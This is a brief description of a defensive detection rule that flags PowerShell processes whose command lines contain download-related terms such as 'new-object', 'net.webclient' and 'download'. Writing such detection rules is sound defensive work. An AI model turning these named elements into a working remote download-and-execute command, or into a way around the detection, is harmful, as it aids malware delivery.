This detection rule identifies potentially malicious activity involving PowerShell by monitoring process creation events. It triggers alerts when a PowerShell process (either 'powershell.exe' or 'pwsh.exe') is executed with specific command-line arguments associated with downloading files. The rule focuses on the presence of commands such as 'new-object', 'net.webclient', and 'download', which are frequently used in PowerShell scripts for network activities that may indicate an attempt to download potentially harmful content from the internet. Notably, it employs a multi-condition selection strategy to ensure that only relevant executions are flagged. False positives may occur due to unknown factors, but the rule is deemed reliable enough to warrant a medium level of concern due to the associated risks of PowerShell misuse in cyber attacks.